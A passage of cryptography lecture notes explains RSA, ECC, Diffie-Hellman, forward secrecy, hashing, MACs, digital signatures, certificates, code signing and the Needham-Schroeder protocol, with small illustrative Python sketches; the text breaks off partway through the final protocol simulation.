Given the ciphertext c, e, and n, there is no efficient way to compute the inverse to obtain m. Should an attacker find a way to factor n into its two prime factors, however, the attacker would be able to reconstruct the encryption and decryption keys, e and d.
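
As a sketch, the RSA arithmetic can be demonstrated with the classic textbook-sized primes 61 and 53 (real RSA uses primes of 1024 bits or more, along with padding schemes omitted here):

```python
# Tiny primes for illustration only; real RSA uses much larger primes.
p, q = 61, 53
n = p * q                    # public modulus: 3233
phi = (p - 1) * (q - 1)      # 3120, used to derive the private exponent
e = 17                       # public (encryption) exponent
d = pow(e, -1, phi)          # private exponent: modular inverse of e (2753)

m = 42                       # a plaintext block, represented as a number < n
c = pow(m, e, n)             # encrypt: c = m^e mod n
assert pow(c, d, n) == m     # decrypt: m = c^d mod n
```

An attacker who could factor n = 3233 back into 61 and 53 could recompute phi and recover d, which is why RSA's security rests on the difficulty of factoring.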

Elliptic curve cryptography (ECC)

Elliptic curve cryptography (ECC) is a more recent public key algorithm that is an alternative to RSA. It is based on finding points along a prescribed elliptic curve, which is an equation of the form:

y^2 = x^3 + ax + b

Contrary to its name, elliptic curves have nothing to do with ellipses or conic sections; plotted, they look like bumpy lines. With elliptic curves, multiplying a point on a given curve by a number produces another point on the curve. However, given that result, it is difficult to find what number was used. The security of ECC rests not on our inability to factor numbers but on our inability to compute discrete logarithms in a finite field.

The RSA algorithm is still the most widely used public key algorithm, but ECC has some advantages:

  • ECC can use far shorter keys for the same degree of security. Security comparable to 256-bit AES encryption requires a 512-bit ECC key but a 15,360-bit RSA key.

  • ECC requires less CPU consumption and uses less memory than RSA. It is faster for encryption (including signature generation) than RSA but slower for decryption.

  • Generating ECC keys is faster than RSA (but much slower than AES, where a key is just a random number).

On the downside, ECC is more complex to implement and decryption is slower than with RSA. As a standard, ECC was also tainted because the NSA inserted weaknesses into the ECC random number generator that effectively created a backdoor for decrypting content. This has been remedied and ECC is generally considered the preferred choice over RSA for most applications.

If you are interested, see here for a somewhat easy-to-understand tutorial on ECC.

Quantum computing

Quantum computers are a markedly different form of computer. Conventional computers store and process information that is represented in bits, with each bit having a distinct value of 0 or 1. Quantum computers use the principles of quantum mechanics, which include superposition and entanglement. Instead of working with bits, quantum computers operate on qubits, which can hold values of “0” and “1” simultaneously via superposition. The superpositions of qubits can be entangled with other objects so that their final outcomes will be mathematically related. A single operation can be carried out on 2^n values simultaneously, where n is the number of qubits in the computer.

While practical quantum computers don’t exist, it’s predicted that certain problems may be solved exponentially faster than with conventional computers. Shor’s algorithm, for instance, will be able to find the prime factors of large integers and compute discrete logarithms far more efficiently than is currently possible.

So far, quantum computers are very much in their infancy, and it is not clear when – or if – large-scale quantum computers capable of solving useful problems will be built. It is unlikely that they will be built in the next several years, but we expect that they will be built eventually. Shor’s algorithm will be able to crack public-key systems such as RSA, Elliptic Curve Cryptography, and Diffie-Hellman key exchange. In 2016, the NSA called for a migration to “post-quantum cryptographic algorithms,” and NIST’s standardization effort narrowed the submissions down to 26 candidates. The goal is to find useful trapdoor functions that do not rely on multiplying large primes, computing exponents, or any other mechanisms that can be attacked by quantum computation. If you are interested in these, you can read the NSA’s report.

Symmetric cryptosystems, such as AES, are not particularly vulnerable to quantum computing since they rely on moving and flipping bits rather than applying mathematical functions to the data. The best potential attack comes via Grover’s algorithm, which yields only a quadratic rather than an exponential speedup in key searches. This effectively halves the length of a key: a 128-bit key would provide only the strength of a 64-bit key against a quantum attacker. It is easy enough to use a sufficiently long key (256-bit AES keys are currently recommended) that quantum computing poses no practical threat to symmetric algorithms.

Secure communication

Symmetric cryptography

Communicating securely with symmetric cryptography is easy. All communicating parties must share the same secret key. Plaintext is encrypted with the secret key to create ciphertext and then transmitted or stored. It can be decrypted by anyone who has the secret key.

Asymmetric cryptography

Communicating securely with asymmetric cryptography is a bit different. Anything encrypted with one key can be decrypted only by the other related key. For Alice to encrypt a message for Bob, she encrypts it with Bob’s public key. Only Bob has the corresponding key that can decrypt the message: Bob’s private key.

Hybrid cryptography

Asymmetric cryptography alleviates the problem of transmitting a key over an insecure channel. However, it is considerably slower than symmetric cryptography. AES, for example, is approximately 1,500 times faster for decryption than RSA and 40 times faster for encryption. AES is also much faster than ECC. Key generation is also far slower with RSA or ECC than it is with symmetric algorithms, where the key is just a random number rather than a set of carefully chosen numbers with specific properties. Moreover, certain keys with RSA may be weaker than others.

Because of these factors, RSA and ECC are never used to encrypt large chunks of information. Instead, it is common to use hybrid cryptography, where a public key algorithm is used to encrypt a randomly-generated key that will encrypt the message with a symmetric algorithm. This randomly-generated key is called a session key, since it is generally used for one communication session and then discarded.

Key Exchange

The biggest problem with symmetric cryptography is key distribution. For Alice and Bob to communicate, they must share a secret key that no adversaries can get. However, Alice cannot send the key to Bob since it would be visible to adversaries. She cannot encrypt it because Alice and Bob do not share a key yet.

Diffie-Hellman key exchange

The Diffie-Hellman key exchange algorithm allows two parties to establish a common key without disclosing any information that would allow any other party to compute the same key. Each party generates a private key and a public key. Despite their name, these are not encryption keys; they are just numbers. Diffie-Hellman does not implement public key cryptography. Alice can compute a common key using her private key and Bob’s public key. Bob can compute the same common key by using his private key and Alice’s public key.

Diffie-Hellman uses the one-way function a^b mod c. Its one-wayness is due to our inability to compute the inverse: a discrete logarithm. Anyone may see Alice and Bob’s public keys but will be unable to compute their common key. Although Diffie-Hellman is not a public key encryption algorithm, it behaves like one in the sense that it allows us to exchange keys without having to use a trusted third party.
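
The exchange can be sketched with toy parameters (real Diffie-Hellman uses a prime of 2048 bits or more):

```python
import secrets

# Toy public parameters, far too small for real use.
p = 23   # public prime modulus
g = 5    # public generator

a = secrets.randbelow(p - 2) + 1   # Alice's private key (never transmitted)
b = secrets.randbelow(p - 2) + 1   # Bob's private key (never transmitted)

A = pow(g, a, p)   # Alice's public key: g^a mod p
B = pow(g, b, p)   # Bob's public key: g^b mod p

# Each side combines its own private key with the other's public key.
shared_alice = pow(B, a, p)   # (g^b)^a mod p
shared_bob   = pow(A, b, p)   # (g^a)^b mod p
assert shared_alice == shared_bob   # both arrive at the same common key
```

An eavesdropper sees p, g, A, and B, but recovering a or b from them requires computing a discrete logarithm, which is infeasible at realistic key sizes.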

Key exchange using public key cryptography

With public key cryptography, there generally isn’t a need for key exchange. As long as both sides can get each other’s public keys from a trusted source, they can encrypt messages using those keys. However, we rarely use public key cryptography for large messages. It can, however, be used to transmit a session key. This use of public key cryptography to transmit a session key that will be used to apply symmetric cryptography to messages is called hybrid cryptography. For Alice to send a key to Bob:

  1. Alice generates a random session key.
  2. She encrypts it with Bob’s public key & sends it to Bob.
  3. Bob decrypts the message using his private key and now has the session key.

Bob is the only one who has Bob’s private key to be able to decrypt that message and extract the session key. A problem with this is that anybody can do this. Charles can generate a random session key, encrypt it with Bob’s public key, and send it to Bob. For Bob to be convinced that it came from Alice, she can encrypt it with her private key (this is signing the message).

  1. Alice generates a random session key.
  2. She signs it by encrypting the key with her private key.
  3. She encrypts the result with Bob’s public key & sends it to Bob.
  4. Bob decrypts the message using his private key.
  5. Bob decrypts the resulting message with Alice’s public key and gets the session key.

If anybody other than Alice created the message, decrypting it with Alice’s public key will not yield a valid key. We can enhance the protocol by using a standalone signature (an encrypted hash) so Bob can distinguish a valid key from a bogus one.

Forward secrecy and key types

If an attacker steals Bob’s private key, they will be able to decrypt old session keys. This is because, at the start of every communication session with Bob, the session key is typically encrypted using Bob’s public key. Once the attacker has Bob’s private key, they can retroactively decrypt these session keys and access past communications.

Forward Secrecy

Forward secrecy, also known as perfect forward secrecy (PFS), ensures that the compromise of a long-term key (e.g., Bob’s private key) does not compromise past session keys. This means there is no secret that, if stolen, allows an attacker to decrypt multiple past messages.

Forward secrecy is valuable for communication sessions but not for stored encrypted documents. In communications, the goal is to prevent an attacker from retroactively decrypting old conversations, even if they later obtain a user’s private key. However, encrypted documents must remain decryptable by the legitimate user, which requires reliance on a long-term key.

Diffie-Hellman and Forward Secrecy

Diffie-Hellman key exchange enables forward secrecy by allowing Alice and Bob to generate temporary (ephemeral) key pairs for each session. The process works as follows:

  1. Alice and Bob each generate a new public-private key pair and exchange their public keys.
  2. Using their own private key and the received public key, they compute a shared secret.
  3. This shared secret is used to encrypt their communication for that session.
  4. For the next session, they generate new key pairs and derive a new shared secret.

Since a new set of keys is used for every session, even if an attacker later compromises Bob’s private key, they cannot decrypt past messages because those sessions used different keys.

In contrast, encrypting a session key with a long-term key (such as Bob’s public key in an RSA-based system) does not provide forward secrecy. If an attacker gains access to Bob’s private key, they can decrypt all past session keys and decrypt old communications.

Types of Cryptographic Keys

  • Long-Term Keys: These keys persist across multiple sessions and are used for authentication, identity verification, and encrypting stored data. Examples include RSA or ECC private keys used to create digital signatures and digital certificates.
  • Ephemeral Keys: These are temporary, single-use keys generated for a session and discarded afterward. Diffie-Hellman and Elliptic Curve Diffie-Hellman are examples used to achieve forward secrecy.
  • Session Keys: These are symmetric encryption keys used for a single communication session. They are often derived from ephemeral key exchanges and are used to encrypt messages between parties for the duration of the session.

Ephemeral keys are discarded as soon as a session key is established. Session keys can be discarded when the communication session ends.

Diffie-Hellman is particularly useful for achieving forward secrecy because it allows efficient on-the-fly key pair generation. While RSA or ECC keys could theoretically be used for ephemeral key exchange, key generation for RSA and ECC is computationally expensive. As a result, RSA and ECC keys are typically used as long-term keys (e.g., for authentication and digital signatures) rather than for generating new session keys dynamically.

Message Integrity

One-way and Trapdoor Functions

A one-way function is easy to compute but infeasible to invert. Given an output, finding the original input is computationally impractical. These functions are the foundation of cryptographic hash functions (e.g., SHA-256), which ensure data integrity, password security, and digital signatures.

A trapdoor function is a one-way function with a secret trapdoor that allows efficient inversion. These functions are fundamental to public-key cryptography, including Diffie-Hellman, RSA, and ECC, enabling secure encryption, decryption, and digital signatures.

Feature         One-Way Function             Trapdoor Function
Inversion       Infeasible                   Possible with the secret trapdoor
Key Use         Hash functions               Public-key cryptography
Security Role   Integrity & authentication   Encryption & key exchange

One-way functions secure hash-based applications, while trapdoor functions enable asymmetric encryption.

Hash functions

A particularly important class of one-way functions is the cryptographic hash function. These functions produce a fixed-size output, regardless of the input size, making them invaluable in various applications. In general computing, hash functions are often used to build hash tables, enabling O(1) key lookups.

However, cryptographic hash functions differ from standard hash functions in that they generate significantly longer outputs—typically 224, 256, 384, or 512 bits. Strong cryptographic hash functions, such as SHA-2 and SHA-3 families, must exhibit several essential properties:

  1. Fixed-Length Output – Like all hash functions, cryptographic hash functions take an input of arbitrary length and produce a fixed-size output.

  2. Deterministic – They always produce the same hash for the same input, ensuring consistency.

  3. Pre-image Resistance (Hiding) – Given a hash value H, it should be computationally infeasible to determine the original input M such that H = hash(M).

  4. Avalanche Effect – The output of a hash function should not give any information about any part of the input. Small changes in the input should result in significantly different hash outputs, preventing any predictable relationship between input and output. For example, changing a byte in the message should result in a completely different hash result, with no ability to predict which bits would flip. The avalanche effect is the result of good diffusion.

  5. Collision Resistance – While hash collisions must theoretically exist (due to the pigeonhole principle), it should be infeasible to find two distinct inputs that produce the same hash. Likewise (see item 4, above), modifying a message should alter the hash in an unpredictable way.

  6. Efficient – Hash functions should be computationally efficient, allowing rapid generation of hashes for applications like message integrity verification without excessive overhead.

Cryptographic hash functions form the foundation of message authentication codes (MACs) and digital signatures, playing a crucial role in ensuring data integrity and authentication.

Due to their properties, we can be highly confident that even the smallest modification to a message will produce a completely different hash. However, the “holy grail” for an attacker is finding a way to create a different, but useful, message that hashes to the same value as a legitimate one. Such an attack could allow message substitution, potentially leading to serious consequences—such as redirecting a financial transaction.

Finding a collision for a specific, known message (a second pre-image attack) is significantly harder than finding any two different messages that hash to the same value (a collision attack). The birthday paradox explains why: the probability of finding any collision is approximately proportional to the square root of the total number of possible hashes. As a result, the security strength of a hash function against brute-force collision attacks is roughly half the number of bits in the hash output. For example, a 256-bit hash function provides approximately 128-bit security against such attacks.
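
The birthday effect is easy to demonstrate by truncating a real hash. The sketch below keeps only 24 bits of SHA-256, so a collision among roughly 16.7 million possible values appears after only a few thousand attempts:

```python
import hashlib

def truncated_hash(msg: bytes, nbytes: int = 3) -> bytes:
    # Keep only the first 24 bits of SHA-256 so a collision is findable quickly.
    return hashlib.sha256(msg).digest()[:nbytes]

seen = {}   # maps truncated hash -> the message that produced it
i = 0
while True:
    msg = f"message {i}".encode()
    h = truncated_hash(msg)
    if h in seen:
        collision = (seen[h], msg)   # two different messages, same truncated hash
        break
    seen[h] = msg
    i += 1

# A 24-bit hash has about 16.7 million values, yet the birthday paradox
# predicts a collision after only ~2^12 = 4096 attempts on average.
assert collision[0] != collision[1]
assert truncated_hash(collision[0]) == truncated_hash(collision[1])
```

For a full 256-bit hash, the same square-root argument puts the collision search at around 2^128 attempts, which is why 256-bit hashes are said to offer 128-bit collision resistance.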

Common cryptographic hash functions include:

  • SHA-1 (160-bit output) – now considered weak due to known vulnerabilities.
  • SHA-2 (e.g., SHA-256, SHA-512) – widely used and considered secure.
  • SHA-3 (e.g., SHA3-256, SHA3-512) – designed as a secure alternative to SHA-2.

Message Authentication Codes (MACs)

A cryptographic hash function helps ensure message integrity by acting as a checksum, allowing detection of any modifications to a message. If a message is altered, its hash will change. However, standard hashes alone do not provide authentication—an attacker could modify both the message and its hash without detection. To address this, we use a cryptographic hash that incorporates a secret key, creating a message authentication code (MAC). Only those who possess the key can generate or verify a valid MAC.

There are two main types of MACs: hash-based and block cipher-based.

Hash-Based MAC (HMAC):
An HMAC transforms a cryptographic hash function (e.g., SHA-256) into a MAC by incorporating a secret key. The message and key are processed together, ensuring that only someone with the correct key can generate or verify the MAC. Without knowledge of the key, an attacker cannot forge a valid MAC, even if they can see previous message-MAC pairs.

Block Cipher-Based MAC (CBC-MAC):
Cipher Block Chaining (CBC) mode ensures that each encrypted block depends on all previous blocks. CBC-MAC leverages this by initializing encryption with a zero initialization vector (IV), encrypting the message in CBC mode, and using only the final encrypted block as the MAC. Any modification to the message propagates through the encryption process, altering the final block and invalidating the MAC.

While CBC-MAC produces a fixed-length result similar to a hash function, it relies on symmetric encryption rather than a hash function for security. Unlike HMAC, its security depends on the underlying block cipher and requires careful handling to prevent certain attacks (e.g., misuse with variable-length messages).

Digital signatures

Message authentication codes (MACs) rely on a shared secret key, meaning that anyone with the key can generate or verify a MAC. However, this does not guarantee that the original author of the message was the one who signed it—any key holder can modify and re-sign the message.

Digital signatures provide stronger guarantees than MACs:

  1. Only the original signer can generate a valid signature, but anyone can verify it.
  2. Signatures are message-specific—copying a signature to a different message invalidates it.
  3. Forgery is infeasible, even if an attacker has seen numerous signed messages.

A digital signature system consists of three fundamental operations:

  1. Key generation: {private_key, verification_key} := gen_keys(keysize)
    Generates a key pair: a private key for signing and a public verification key for validation.
  2. Signing: signature := sign(message, private_key)
    Creates a digital signature using the private key.
  3. Validation: isvalid := verify(message, signature, verification_key)
    Checks whether a signature is valid using the public verification key.

Signing hashes instead of messages

Since cryptographic hashes are designed to be collision-resistant, it is common practice to sign the hash of a message rather than the message itself. This approach ensures that:

  • The signature is small and fixed in size, regardless of message length.
  • The signature is efficient to compute and verify.
  • It integrates easily into data structures and protocols that require signatures.
  • It creates minimal transmission or storage overhead.

There are several commonly used digital signature algorithms:

DSA, the Digital Signature Algorithm
The current NIST standard, based on the difficulty of computing discrete logarithms.
ECDSA, Elliptic Curve Digital Signature Algorithm
A variant of DSA that uses elliptic curve cryptography (ECC), providing equivalent security with smaller key sizes than traditional DSA.
RSA
Uses RSA encryption principles to sign message hashes. Unlike DSA and ECDSA, which are dedicated signature schemes, RSA is a general-purpose public-key cryptosystem that can be used for both encryption and signing.

All these algorithms use public and private key pairs.

We previously saw how public-key cryptography allows encryption:

  • Alice encrypts a message with Bob’s public key, ensuring that only Bob can decrypt it with his private key.

Digital signatures work in a similar way, but in reverse:

  • Alice “encrypts” (signs) a message hash using her private key.
  • Anyone with Alice’s public key can decrypt and verify the signature, confirming that the message was signed by Alice.

Instead of encrypting the entire message, most digital signature algorithms apply a hash function first, then sign the hash using a trapdoor function (such as modular exponentiation in RSA or ECC operations in ECDSA). This ensures that only the signer can generate a valid signature, but anyone can verify it using the public key.

Unlike MACs, digital signatures provide non-repudiation—proof that a specific entity signed a message. Alice cannot deny creating a signature, as only her private key could have produced it.

Both MACs and digital signatures provide message integrity, ensuring that the message has not been altered. However, digital signatures go further by allowing anyone to verify authenticity without requiring a shared secret key.

Property               Message Authentication Codes (MACs)      Digital Signatures
Key Type               Shared secret key                        Public-private key pair
Who Can Sign?          Anyone with the key                      Only the private key holder
Who Can Verify?        Only those with the key                  Anyone with the public key
Non-Repudiation        No (any key holder can generate a MAC)   Yes (only the private key holder can sign)
Integrity Proof        Yes                                      Yes
Publicly Verifiable?   No (requires the secret key)             Yes

Covert and authenticated messaging

We ignored the encryption of a message in the preceding discussion; our interest was assuring integrity. However, there are times when we may want to keep the message secret and validate that it has not been modified. Doing this involves sending a signature of the message along with the encrypted message.

A basic way for Alice to send a signed and encrypted message to Bob is for her to use hybrid cryptography and:

  1. Create a signature of the message. This is a hash of the message encrypted with her private key.
  2. Create a session key for encrypting the message. This is a throw-away key that will not be needed beyond the communication session.
  3. Encrypt the message using the session key. She will use a fast symmetric algorithm to encrypt this message.
  4. Package up the session key for Bob: she encrypts it with Bob’s public key. Since only Bob has the corresponding private key, only Bob will be able to decrypt the session key.
  5. She sends Bob: the encrypted message, encrypted session key, and signature.
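
Under stated assumptions (toy RSA key pairs with tiny primes, and a SHA-256-derived keystream standing in for a real symmetric cipher such as AES), the five steps above can be sketched as:

```python
import hashlib
import secrets

def make_keys(p, q, e):
    # Toy RSA key pair -- tiny primes, illustration only.
    n, phi = p * q, (p - 1) * (q - 1)
    return (pow(e, -1, phi), n), (e, n)      # (private key, public key)

alice_priv, alice_pub = make_keys(61, 53, 17)   # Alice signs with her private key
bob_priv, bob_pub = make_keys(89, 97, 5)        # Bob receives the session key

def keystream(key: int, length: int) -> bytes:
    # Expand the session key into a keystream (stand-in for a real symmetric cipher).
    out, ctr = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key.to_bytes(8, "big") +
                              ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:length]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

message = b"Meet at noon."

# 1. Signature: hash the message, "encrypt" the hash with Alice's private key.
d_a, n_a = alice_priv
h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n_a
signature = pow(h, d_a, n_a)

# 2-4. Create a throw-away session key, encrypt the message with it,
#      and encrypt the session key with Bob's public key.
e_b, n_b = bob_pub
session = secrets.randbelow(n_b - 2) + 2
ciphertext = xor(message, keystream(session, len(message)))
enc_session = pow(session, e_b, n_b)

# 5. Alice sends (ciphertext, enc_session, signature). Bob reverses the steps:
d_b, _ = bob_priv
recovered = pow(enc_session, d_b, n_b)                  # only Bob can do this
plaintext = xor(ciphertext, keystream(recovered, len(ciphertext)))
e_a, _ = alice_pub
h2 = int.from_bytes(hashlib.sha256(plaintext).digest(), "big") % n_a
assert plaintext == message
assert pow(signature, e_a, n_a) == h2   # signature checks out with Alice's public key
```

Only Bob can recover the session key (his private key is needed), and only Alice could have produced a signature that verifies with her public key.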

Anonymous identities

A signature verification key (e.g., a public key) can be treated as an identity. You possess the corresponding private key and therefore only you can create valid signatures that can be verified with the public key. This identity is anonymous; it is just a bunch of bits. There is nothing that identifies you as the holder of the key. You can simply assert your identity by being the sole person who can generate valid signatures.

Since you can generate an arbitrary number of key pairs, you can create a new identity at any time and create as many different identities as you want. When you no longer need an identity, you can discard your private key for that corresponding public key.

Identity binding: digital certificates

While public keys provide a mechanism for asserting integrity via digital signatures, they are themselves anonymous. We’ve discussed a scenario where Alice uses Bob’s public key but never explained how she can assert that the key really belongs to Bob and was not planted by an adversary. Some form of identity binding of the public key must be implemented for you to know that you really have my public key instead of someone else’s. How does Alice really know that she has Bob’s public key?

X.509 digital certificates provide a way to do this. A certificate is a data structure that contains user information (called a distinguished name) and the user’s public key. This data structure also contains a signature of the certification authority. The signature is created by taking a hash of the rest of the data in the structure and encrypting it with the private key of the certification authority. The certification authority (CA) is responsible for setting policies of how they validate the identity of the person who presents the public key for encapsulation in a certificate.

To validate a certificate, you would hash all the certificate data except for the signature. Then you would decrypt the signature using the public key of the issuer. If the two values match, then you know that the certificate data has not been modified since it has been signed. The challenge is how to get the public key of the issuer. Public keys are stored in certificates, so the issuer would have a certificate containing its public key. This certificate can be signed by yet another issuer. This kind of process is called certificate chaining.

For example, Alice can have a certificate issued by the Rutgers CS Department. The Rutgers CS Department’s certificate may be issued by Rutgers University. Rutgers University’s certificate could be issued by the State of New Jersey Certification Authority, and so on. At the very top level, we will have a certificate that is not signed by any higher-level certification authority. A certification authority that is not underneath any other CA is called a root CA.

In practice, this type of chaining is rarely used. More commonly, there are hundreds of autonomous certification authorities acting as root CAs that issue certificates to companies, users, and services. The certificates for many of the trusted root CAs are preloaded into operating systems or, in some cases, browsers. See here for Microsoft’s trusted root certificate participants and here for Apple’s trusted root certificates.

Every certificate has an expiration time (often a year or more in the future). This provides some assurance that even if there is a concerted attack to find a corresponding private key to the public key in the certificate, such a key will not be found until long after the certificate expires. There might be cases where a private key might be leaked or the owner may no longer be trustworthy (for example, an employee leaves a company). In this case, a certificate can be revoked. Each CA publishes a certificate revocation list, or CRL, containing lists of certificates that they have previously issued that should no longer be considered valid. To prevent spoofing the CRL, the list is, of course, signed by the CA. Each certificate contains information on where to obtain revocation information.

The challenge with CRLs is that not everyone may check the certificate revocation list in a timely manner and some systems may accept a certificate not knowing that it was revoked. Some systems, particularly embedded systems, may not even be configured to handle CRLs.

Code signing - protecting code integrity

We have seen how hash functions are used for message integrity through message authentication codes (MACs) (which rely on a shared key) and digital signatures (which use public and private keys). The same cryptographic principles apply to code signing, a process that ensures software has not been modified since it was created by the developer.

Code signing protects against tampered or malicious software. It allows operating systems to verify software authenticity, detect unauthorized modifications, and prevent execution of compromised applications—all without requiring users to manually inspect their downloads.

Signing software allows it to be downloaded from untrusted sources or distributed over untrusted channels while still ensuring it has not been altered. It also enables the detection of malware that may have modified software after installation.

Modern operating systems such as Microsoft Windows, Apple macOS, iOS, and Android extensively use code signing to validate software authenticity and integrity.

Code signing process

  1. Key Pair Generation – The software publisher generates a public/private key pair.
  2. Certificate Issuance – The public key is included in a digital certificate, typically issued by a Certificate Authority (CA) that verifies the publisher’s identity.
  3. Hash Generation – The publisher computes a cryptographic hash of the software.
  4. Signature Creation – The hash is encrypted with the private key, producing a digital signature.
  5. Attaching the Signature – The signature and the certificate are embedded in the software package to allow verification.

Code verification process

  1. Certificate Validation – Before installation, the system checks the certificate’s validity by ensuring it was issued by a trusted CA and has not been revoked or expired.
  2. Hash Computation – The system generates a new hash from the downloaded software.
  3. Signature Decryption – The digital signature is decrypted using the publisher’s public key, revealing the original hash.
  4. Integrity Check – The system compares the decrypted hash with the newly computed hash. If they match, the software is authentic and unmodified. If they do not match, this indicates tampering or corruption, and the software may be rejected as untrusted.

Some signed software, particularly system-critical applications, also supports per-page hashing. In demand paging, an operating system loads only the necessary portions (pages) of a program into memory as needed rather than loading the entire executable at once. Instead of verifying a large file before execution, per-page hashing allows each 4KB page to be individually validated upon loading. This ensures integrity at runtime, helping detect in-memory modifications or tampering even after installation.
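A minimal sketch of per-page hashing with Python's hashlib (the 10,000-byte stand-in binary is illustrative): the loader verifies only the 4 KB page it is about to map, not the whole file.

```python
import hashlib

PAGE_SIZE = 4096  # 4 KB, matching a typical memory page

def page_hashes(executable: bytes) -> list[bytes]:
    """One hash per page so each page can be checked as it is demand-loaded."""
    return [hashlib.sha256(executable[i:i + PAGE_SIZE]).digest()
            for i in range(0, len(executable), PAGE_SIZE)]

binary = bytes(10000)          # stand-in for a signed executable image
trusted = page_hashes(binary)  # these hashes would be covered by the code signature

# At load time, verify only the page being brought into memory:
page_index = 1
loaded_page = binary[page_index * PAGE_SIZE:(page_index + 1) * PAGE_SIZE]
assert hashlib.sha256(loaded_page).digest() == trusted[page_index]
print(len(trusted), "page hashes computed")
```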

Authentication

Authentication is the process of verifying that a user’s claimed identity is legitimate.

It is important to distinguish authentication from identification:

  • Identification is the act of claiming an identity (e.g., entering a username or presenting an ID).
  • Authentication is the process of proving that the claimed identity is valid (e.g., by providing a correct password, fingerprint, or security token).

Authorization is a separate process that determines what actions or resources an authenticated user is permitted to access.

Authentication factors

The three factors of authentication are:

  1. something you have – a physical object, such as a key, smart card, or security token.
  2. something you know – a secret, such as a password, PIN, or security answer.
  3. something you are – a biological trait, such as a fingerprint, retina scan, or facial recognition.

Using multi-factor authentication (MFA) enhances security by requiring authentication from two or more different factors. This ensures that even if one factor is compromised, unauthorized access remains difficult.

Importantly, MFA requires factors from different categories. Using two passwords or two security questions does not qualify as multi-factor authentication because both fall under “Something You Know.”
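The category rule can be expressed as a small check. The factor registry below is entirely hypothetical; the point is only that two methods from the same category do not count as multi-factor:

```python
# Hypothetical mapping from authentication method to its factor category.
FACTOR_CATEGORY = {
    "password": "know", "pin": "know", "security_question": "know",
    "smart_card": "have", "totp_app": "have",
    "fingerprint": "are", "face_scan": "are",
}

def is_multi_factor(methods: list[str]) -> bool:
    """True only if the methods span at least two distinct factor categories."""
    return len({FACTOR_CATEGORY[m] for m in methods}) >= 2

print(is_multi_factor(["password", "totp_app"]))          # know + have: MFA
print(is_multi_factor(["password", "security_question"])) # both 'know': not MFA
```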

Combined authentication and key exchange protocols

Key exchange and authentication using a trusted third party

When two parties want to communicate securely using symmetric encryption, they need to share a common key. There are three primary ways to achieve this:

  1. Pre-shared Key Exchange – The key is exchanged outside the network using a secure method, such as reading it over the phone or physically delivering it on a flash drive.
  2. Public Key Cryptography – The key is securely exchanged using asymmetric encryption (e.g., RSA or Diffie-Hellman).
  3. Trusted Third Party (TTP) Key Exchange – A centralized authority manages and distributes keys to authenticated users.

A trusted third party (TTP) is a system that securely holds each participant’s secret key. In this model, Alice and the TTP (Trent) share Alice’s secret key. Likewise, Bob and Trent share Bob’s secret key.

The simplest way of using a trusted third party is to ask it to come up with a session key and send it to the parties that wish to communicate. For example:

  1. Alice requests a session key from Trent to communicate with Bob. This request is encrypted with Alice’s secret key, ensuring that Trent knows it came from Alice.
  2. Trent generates a random session key and encrypts it into two messages: One copy is encrypted with Alice’s secret key. Another copy is encrypted with Bob’s secret key.
  3. Trent sends both encrypted versions to Alice. Alice decrypts her copy to obtain the session key. She then forwards the encrypted session key meant for Bob to Bob.
  4. Bob decrypts his copy using his secret key. Now both Alice and Bob share the session key for secure communication.

This simple scheme is vulnerable to replay attacks. An eavesdropper, Eve, can record messages from Alice to Bob and replay them at a later time. Eve might not be able to decode the messages but she can confuse Bob by sending him seemingly valid encrypted messages.

The second problem is that Alice forwards Bob an encrypted session key, but Bob has no idea that it is Alice who is requesting to communicate with him. While Trent authenticated Alice (simply by being able to decrypt her request) and authorized her to talk with Bob (by generating the session key), that information has not been conveyed to Bob. This problem can be solved by having Trent package information about the other party within the encrypted messages that contain the session key.

Needham-Schroeder: nonces

The Needham-Schroeder protocol improves the basic key exchange protocol by adding nonces to messages. A nonce is simply a random string – a random bunch of bits that are used to prevent replay attacks.

Step 1. Alice Requests a Session Key from Trent

Alice sends a request to Trent (the TTP), asking to establish communication with Bob. She includes a random nonce (NA) to ensure freshness of the message. Note that this request does not need to be encrypted.

Step 2. Trent Responds with a Secure Session Key

Trent generates a random session key (KAB) for Alice and Bob and sends Alice the following, encrypted with Alice’s secret key:

  • Alice’s ID
  • Bob’s ID
  • Alice’s nonce, NA
  • the session key, KAB
  • a ticket: a message encrypted for Bob that contains Alice’s ID and the same session key (KAB)

This entire message from Trent is encrypted with Alice’s secret key.

Step 3. Alice Validates the Message and Forwards the Ticket to Bob

Alice decrypts Trent’s response using her secret key and verifies that the nonce matches her original request, ensuring it’s not a replay attack.

She then forwards the ticket (which is encrypted for Bob and unreadable to her) to Bob.

Step 4: Bob Validates the Ticket and Extracts the Session Key

Bob decrypts the ticket using his secret key and learns:

  • The session key (KAB).
  • That he is communicating with Alice, as her ID is in the ticket.
  • That the session key was generated by Trent, since only Trent knows Bob’s secret key and could have created the ticket.

Step 5: Bob Authenticates Alice

Bob now needs to confirm that Alice actually has the session key. He does this by sending Alice a challenge-response authentication:

  1. Bob generates a random nonce (NB), encrypts it with the session key (KAB), and sends it to Alice.
  2. Alice decrypts the nonce, subtracts 1, then encrypts the result with KAB and sends it back to Bob.
  3. Bob verifies that the returned value is (NB - 1), proving that Alice knows the session key.

At this point, both Alice and Bob have authenticated each other and share a secure session key for further communication.
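The five steps can be traced in a short simulation. Encryption here is mocked with tagged tuples purely to make the message flow visible; a real implementation would use an authenticated symmetric cipher:

```python
import secrets

def enc(key, payload):
    """Mock symmetric encryption (a tagged tuple), for illustration only."""
    return ("enc", key, payload)

def dec(key, box):
    tag, k, payload = box
    assert tag == "enc" and k == key, "wrong key"
    return payload

# Long-term secrets each party shares with Trent, the trusted third party.
K_alice, K_bob = "K_A", "K_B"

# Step 1: Alice -> Trent: IDs plus a fresh nonce (sent in the clear).
NA = secrets.token_hex(8)

# Step 2: Trent -> Alice: {A, B, NA, KAB, ticket} encrypted for Alice,
# where the ticket = {A, KAB} is encrypted for Bob.
KAB = secrets.token_hex(16)
ticket = enc(K_bob, ("Alice", KAB))
msg2 = enc(K_alice, ("Alice", "Bob", NA, KAB, ticket))

# Step 3: Alice decrypts, checks her nonce (freshness), forwards the ticket.
a, b, na, kab_alice, fwd_ticket = dec(K_alice, msg2)
assert na == NA, "replayed response!"

# Step 4: Bob opens the ticket with his secret key.
sender, kab_bob = dec(K_bob, fwd_ticket)
assert sender == "Alice" and kab_bob == kab_alice

# Step 5: challenge-response proves Alice holds KAB.
NB = secrets.randbelow(1 << 32)
challenge = enc(kab_bob, NB)
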